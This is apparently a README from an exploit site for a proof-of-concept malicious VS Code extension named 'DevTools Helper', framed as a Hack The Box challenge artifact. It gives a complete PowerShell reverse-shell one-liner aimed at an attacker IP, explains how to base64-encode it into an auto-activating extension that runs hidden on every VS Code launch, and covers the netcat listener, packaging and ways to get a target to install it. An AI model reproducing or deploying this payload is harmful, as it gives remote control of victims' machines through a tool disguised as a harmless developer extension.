Share
## https://sploitus.com/exploit?id=833581E3-D09A-5C85-BB3D-46DA43EDAF50
# DevTools Helper โ€” Malicious Extension PoC (CVE-2025-55319)

Proof-of-concept VS Code (`.vsix`) extension for the **HTB "Checkpoint"** challenge.
Once installed, the extension auto-activates and spawns a hidden PowerShell reverse
shell back to the attacker.

> โš ๏ธ **Authorized use only.** This is a CTF/lab artifact. Only deploy it against machines
> you own or are explicitly authorized to test (e.g. an HTB target box).

---

## How it works

- **`extension/package.json`** โ€” extension manifest. `"activationEvents": ["*"]` makes it
  run the moment VS Code loads, with no user interaction.
- **`extension/extension.js`** โ€” on `activate()`, executes a base64-encoded PowerShell
  payload with `-WindowStyle Hidden -NoProfile` for a silent reverse shell.
- **`[Content_Types].xml`** โ€” OpenXML content-type manifest so the folder can be zipped
  into a valid `.vsix` package.

---

## Layout

```
.
โ”œโ”€โ”€ [Content_Types].xml     # VSIX content-type manifest
โ””โ”€โ”€ extension/
    โ”œโ”€โ”€ package.json        # extension manifest (activates on "*")
    โ””โ”€โ”€ extension.js        # reverse-shell payload
```

---

## Usage

### 1. Build your payload

Generate a base64 (UTF-16LE) PowerShell reverse shell pointing at your attack box:

```bash
LHOST=10.10.15.158
LPORT=4443
PS="\$c=New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT);\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length)) -ne 0){\$d=(New-Object System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$r=(iex \$d 2>&1|Out-String);\$sb=([text.encoding]::ASCII).GetBytes(\$r+'PS> ');\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()}"
echo -n "$PS" | iconv -t UTF-16LE | base64 -w0
```

Paste the output over `YOUR_BASE64_PAYLOAD_HERE` in `extension/extension.js`:

```js
const payload = ''
```

### 2. Start your listener

```bash
nc -lvnp 4443
```

### 3. Package into a .vsix

A `.vsix` is just a ZIP with the `extension/` folder plus the manifest at the root:

```bash
# from this directory
zip -r devtools-helper.vsix extension "[Content_Types].xml"
```

### 4. Deliver & trigger

Get the target to install the extension. Either:

- **CLI:** `code --install-extension devtools-helper.vsix`
- **GUI:** Extensions view โ†’ `ยทยทยท` menu โ†’ *Install from VSIXโ€ฆ*

On the next VS Code launch (or immediately after install), the `*` activation event
fires, the payload runs, and your listener receives the shell.

```
$ nc -lvnp 4443
listening on [any] 4443 ...
connect to [10.10.15.158] from ...
PS>
```

---

## Cleanup

Remove the extension from the target when done:

```bash
code --uninstall-extension devtools.devtools-helper
```

---

## Notes

- The payload targets **Windows** (PowerShell). Adjust `extension.js` for other platforms.
- `os` is imported in `extension.js` but unused โ€” handy if you want to branch on
  `os.platform()` to support Linux/macOS targets.
- Bump the `version` in `package.json` between builds if you re-package.